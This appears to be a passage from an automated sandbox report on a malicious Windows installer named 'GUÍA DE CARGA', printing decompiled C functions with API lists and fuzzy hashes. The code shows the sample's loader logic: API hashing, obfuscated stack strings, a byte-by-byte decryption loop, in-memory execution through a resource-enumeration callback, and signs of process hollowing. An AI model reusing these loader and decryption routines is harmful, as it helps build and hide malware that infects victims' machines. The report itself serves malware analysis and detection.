                        0x7333c453
                        0x7333c456
                        0x7333c45d
                        0x7333c464
                        0x7333c46a
                        0x7333c46d
                        0x7333c482
                        0x7333c48c
                        0x7333c493
                        0x00000000
                        0x7333c49a
                        0x00000000
                        0x7333c497
                        0x00000000
                        0x7333c486
                        0x00000000
                        0x7333c461
                        0x00000000
                        0x7333c3ed
                        0x00000000
                        0x7333c3cb
                        0x7333c385
                        0x7333c38e
                        0x00000000
                        0x00000000
                        0x7333c396
                        0x7333c39d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x7333c3a1
                        0x00000000
                        0x7333c36e
                        0x00000000
                        0x7333c34a
                        0x00000000
                        0x7333c327
                        0x00000000

                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 7333C31E
                        • GetThreadContext.KERNELBASE(?,00010007), ref: 7333C341
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ContextCreateProcessThread
                        • String ID: D
                        • API String ID: 2843130473-2746444292
                        • Opcode ID: c0a8b80f715fce2d5bc6a5507048dc171b3f4f06f1a1fbc27ea720535ae5c4dc
                        • Instruction ID: 15d9994eb2eb2a0eb5b14ed0bbf10c586f3c0f4c119e776d5ebf630ec38435ae
                        • Opcode Fuzzy Hash: c0a8b80f715fce2d5bc6a5507048dc171b3f4f06f1a1fbc27ea720535ae5c4dc
                        • Instruction Fuzzy Hash: 5EA1D670E04219EFDB51DFA4C980BADBBB9EF09305F508469E55AE7250D734AA81CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                        0x00405f00
                        0x00405f09
                        0x00405f0b
                        0x00405f0b
                        0x00405f0f
                        0x00405f21
                        0x00405f1b
                        0x00405f1b
                        0x00405f1b
                        0x00405f25
                        0x00405f39
                        0x00405f4d
                        0x00405f54

                        APIs
                        • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                        • wsprintfA.USER32 ref: 00405F39
                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%s.dll$UXTHEME$\
                        • API String ID: 2200240437-4240819195
                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                        • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                        • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                        0x004058d1
                        0x004058d7
                        0x004058d8
                        0x004058d8
                        0x004058d9
                        0x004058e0
                        0x004058ea
                        0x004058f7
                        0x004058fa
                        0x00405902
                        0x00000000
                        0x00000000
                        0x00405906
                        0x00000000
                        0x00000000
                        0x00405908
                        0x00000000
                        0x00405908
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 004058E0
                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-253151231
                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                        • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                        • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B070, Relevance: 7.7, APIs: 5, Instructions: 199fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E7333B070() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				long _v124;
				short _v1164;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t93;
				short _t94;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				short _t122;
				short _t123;
				short _t124;
				short _t125;
				void* _t133;
				signed int _t134;
				void* _t135;
				int _t137;
				void* _t140;

				_t84 = 0x53;
				_v44 = _t84;
				_t85 = 0x68;
				_v42 = _t85;
				_t86 = 0x6c;
				_v40 = _t86;
				_t87 = 0x77;
				_v38 = _t87;
				_t88 = 0x61;
				_v36 = _t88;
				_t89 = 0x70;
				_v34 = _t89;
				_t90 = 0x69;
				_v32 = _t90;
				_t91 = 0x2e;
				_v30 = _t91;
				_t92 = 0x64;
				_v28 = _t92;
				_t93 = 0x6c;
				_v26 = _t93;
				_t94 = 0x6c;
				_v24 = _t94;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E7333B737();
				_v88 = E7333B7E6(_v8, 0x7fc01dae);
				_v120 = E7333B7E6(_v8, 0xff7f721a);
				_v84 = E7333B7E6(_v8, 0x7fd6a366);
				_v92 = E7333B7E6(_v84( &_v44), 0x7f5a653a);
				_v116 = E7333B7E6(_v8, 0x7f91a078);
				_v96 = E7333B7E6(_v8, 0x7fe63623);
				_v100 = E7333B7E6(_v8, 0x7fbd727f);
				_v104 = E7333B7E6(_v8, 0x7fb47add);
				_v108 = E7333B7E6(_v8, 0x7fe7f840);
				_t150 = _v8;
				_v112 = E7333B7E6(_v8, 0x7fe1f1fb);
				_t109 = 0x31;
				_v80 = _t109;
				_t110 = 0x35;
				_v78 = _t110;
				_t111 = 0x30;
				_v76 = _t111;
				_t112 = 0x71;
				_v74 = _t112;
				_t113 = 0x78;
				_v72 = _t113;
				_t114 = 0x30;
				_v70 = _t114;
				_t115 = 0x75;
				_v68 = _t115;
				_t116 = 0x75;
				_v66 = _t116;
				_t117 = 0x72;
				_v64 = _t117;
				_t118 = 0x62;
				_v62 = _t118;
				_t119 = 0x6a;
				_v60 = _t119;
				_t120 = 0x30;
				_v58 = _t120;
				_t121 = 0x37;
				_v56 = _t121;
				_t122 = 0x34;
				_v54 = _t122;
				_t123 = 0x37;
				_v52 = _t123;
				_t124 = 0x38;
				_v50 = _t124;
				_t125 = 0x74;
				_v48 = _t125;
				_v46 = 0;
				_v88(0x103,  &_v1164);
				_v92( &_v1164,  &_v80);
				_t133 = CreateFileW( &_v1164, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t133;
				if(_v20 != 0xffffffff) {
					_t134 = _v100(_v20, 0);
					_v12 = _t134;
					if(_v12 != 0xffffffff) {
						_t135 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t135;
						if(_v16 != 0) {
							_t137 = ReadFile(_v20, _v16, _v12,  &_v124, 0);
							if(_t137 != 0) {
								FindCloseChangeNotification(_v20);
								_v16 = E7333BA86(_t150, _v16, _v12);
								_t140 = E7333BEB2(_v16); // executed
								ExitProcess(0);
							}
							return _t137;
						}
						return _t135;
					}
					return _t134;
				}
				return _t133;
			}


















































































                        0x7333b858
                        0x7333b859
                        0x7333b85f
                        0x7333b860
                        0x7333b866
                        0x7333b867
                        0x7333b86d
                        0x7333b86e
                        0x7333b874
                        0x7333b875
                        0x7333b87b
                        0x7333b87c
                        0x7333b882
                        0x7333b883
                        0x7333b889
                        0x7333b88a
                        0x7333b890
                        0x7333b891
                        0x7333b897
                        0x7333b898
                        0x7333b89e
                        0x7333b89f
                        0x7333b8a5
                        0x7333b8a9
                        0x7333b8b2
                        0x7333b8c2
                        0x7333b8d2
                        0x7333b8e2
                        0x7333b8f8
                        0x7333b908
                        0x7333b918
                        0x7333b928
                        0x7333b938
                        0x7333b948
                        0x7333b950
                        0x7333b958
                        0x7333b95d
                        0x7333b95e
                        0x7333b964
                        0x7333b965
                        0x7333b96b
                        0x7333b96c
                        0x7333b972
                        0x7333b973
                        0x7333b979
                        0x7333b97a
                        0x7333b980
                        0x7333b981
                        0x7333b987
                        0x7333b988
                        0x7333b98e
                        0x7333b98f
                        0x7333b995
                        0x7333b996
                        0x7333b99c
                        0x7333b99d
                        0x7333b9a3
                        0x7333b9a4
                        0x7333b9aa
                        0x7333b9ab
                        0x7333b9b1
                        0x7333b9b2
                        0x7333b9b8
                        0x7333b9b9
                        0x7333b9bf
                        0x7333b9c0
                        0x7333b9c6
                        0x7333b9c7
                        0x7333b9cd
                        0x7333b9ce
                        0x7333b9d4
                        0x7333b9e4
                        0x7333b9f2
                        0x7333ba0e
                        0x7333ba11
                        0x7333ba18
                        0x7333ba21
                        0x7333ba24
                        0x7333ba2b
                        0x7333ba3b
                        0x7333ba3e
                        0x7333ba45
                        0x7333ba58
                        0x7333ba5d
                        0x7333ba64
                        0x7333ba72
                        0x7333ba78
                        0x7333ba7f
                        0x7333ba7f
                        0x00000000
                        0x7333ba5d
                        0x00000000
                        0x7333ba45
                        0x00000000
                        0x7333ba2b
                        0x00000000

                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333BA0E
                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 9b4afcd4cf64c47cda820c02aed72c6665359752fa668aefeb9884c36dde8a52
                        • Instruction ID: a9467b2e922316936af279fa37b61e05b3ca20b3067db5eefaec412ed053bbcb
                        • Opcode Fuzzy Hash: 9b4afcd4cf64c47cda820c02aed72c6665359752fa668aefeb9884c36dde8a52
                        • Instruction Fuzzy Hash: 9C713E35E54348EBEB60CBE4EC51BEDBBB5AF48710F60851AE508FA2E0E7700A41DB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                        0x00401f84
                        0x00401f84
                        0x00401f89
                        0x00401f90
                        0x0040204c
                        0x00402197
                        0x00402197
                        0x004028be
                        0x004028c1
                        0x004028cd
                        0x004028cd
                        0x00401f9f
                        0x00401fa9
                        0x00401fac
                        0x00401fbb
                        0x00401fbf
                        0x00401fc5
                        0x00401fc9
                        0x00402045
                        0x00000000
                        0x00402045
                        0x00401fcb
                        0x00401fd5
                        0x00401fd9
                        0x0040201d
                        0x00401fdb
                        0x00401fde
                        0x00401fe1
                        0x00402011
                        0x00401fe3
                        0x00401fe6
                        0x00401fef
                        0x00401ff1
                        0x00401ff1
                        0x00401fef
                        0x00401fe1
                        0x00402025
                        0x0040203a
                        0x0040203a
                        0x00000000
                        0x00402025
                        0x00401faf
                        0x00401fb5
                        0x00401fb9
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419EEA,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419EEA,7519EA30), ref: 00404F0F
                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                        • String ID:
                        • API String ID: 2987980305-0
                        • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                        • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                        • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                        • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                        0x004015b3
                        0x004015ba
                        0x004015bd
                        0x004015c2
                        0x004015c6
                        0x004015c8
                        0x004015d0
                        0x004015d2
                        0x004015d4
                        0x004015d8
                        0x004015db
                        0x004015f3
                        0x004015f4
                        0x004015dd
                        0x004015dd
                        0x004015e0
                        0x00000000
                        0x004015eb
                        0x004015ec
                        0x004015ec
                        0x004015e0
                        0x004015fb
                        0x00401602
                        0x0040160f
                        0x0040160f
                        0x00401604
                        0x00401605
                        0x0040160d
                        0x00000000
                        0x00000000
                        0x0040160d
                        0x00401602
                        0x00401612
                        0x00401615
                        0x00401617
                        0x00401618
                        0x004015c8
                        0x0040161f
                        0x0040164a
                        0x00402197
                        0x00401621
                        0x00401623
                        0x0040162e
                        0x00401634
                        0x0040163c
                        0x00401642
                        0x00401642
                        0x0040163c
                        0x004028c1
                        0x004028cd

                        APIs
                          • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                          • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                          • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-1943935188
                        • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                        • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                        • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
                        • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 73337500, Relevance: 3.2, APIs: 2, Instructions: 174memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E73337500(void* __ecx) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _t112;
				int _t115;
				void* _t151;

				_t151 = __ecx;
				_v16 = 0;
				_t112 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
				_v16 = _t112;
				if(_v16 != 0) {
					E733377B0(_t151, _v16, 0xbebc200);
					_v12 = 0;
					_v12 = 0;
					while(_v12 < 0x1434) {
						_t11 = E7333B070 + _v12; // 0x202c7025
						_v5 =  *_t11;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x00000035;
						_v5 = (_v5 & 0x000000ff) + 0x9e;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x40;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xb6;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
						_v5 = (_v5 & 0x000000ff) + 0xa2;
						_v5 = _v5 & 0x000000ff ^ 0x000000a8;
						_v5 = (_v5 & 0x000000ff) - 0x8d;
						_v5 = _v5 & 0x000000ff ^ 0x0000008e;
						_v5 = (_v5 & 0x000000ff) - 0x84;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ 0x000000bf;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xfc;
						_v5 = _v5 & 0x000000ff ^ _v12;
						 *((char*)(E7333B070 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					_t115 = EnumResourceTypesA(0, E7333B070, 0); // executed
					return _t115;
				}
				return _t112;
			}









                        0x73337500
                        0x73337506
                        0x7333751b
                        0x73337521
                        0x73337528
                        0x73337537
                        0x7333753f
                        0x73337546
                        0x73337558
                        0x73337568
                        0x7333756e
                        0x73337577
                        0x73337580
                        0x7333758a
                        0x73337597
                        0x733375a0
                        0x733375aa
                        0x733375b4
                        0x733375c7
                        0x733375d1
                        0x733375da
                        0x733375e4
                        0x733375ed
                        0x733375f7
                        0x73337600
                        0x73337612
                        0x7333761b
                        0x7333762d
                        0x73337636
                        0x73337643
                        0x7333764c
                        0x73337656
                        0x73337660
                        0x73337669
                        0x7333767b
                        0x73337685
                        0x73337698
                        0x733376a5
                        0x733376b1
                        0x733376be
                        0x733376cb
                        0x733376d7
                        0x733376e0
                        0x733376ed
                        0x733376f7
                        0x73337700
                        0x7333770a
                        0x7333771d
                        0x73337726
                        0x73337732
                        0x7333773c
                        0x73337745
                        0x73337555
                        0x73337555
                        0x73337759
                        0x00000000
                        0x73337759
                        0x73337762

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,0BEBC200,00003000,00000004), ref: 7333751B
                        • EnumResourceTypesA.KERNEL32 ref: 73337759
                        Memory Dump Source
                        • Source File: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AllocEnumResourceTypesVirtual
                        • String ID:
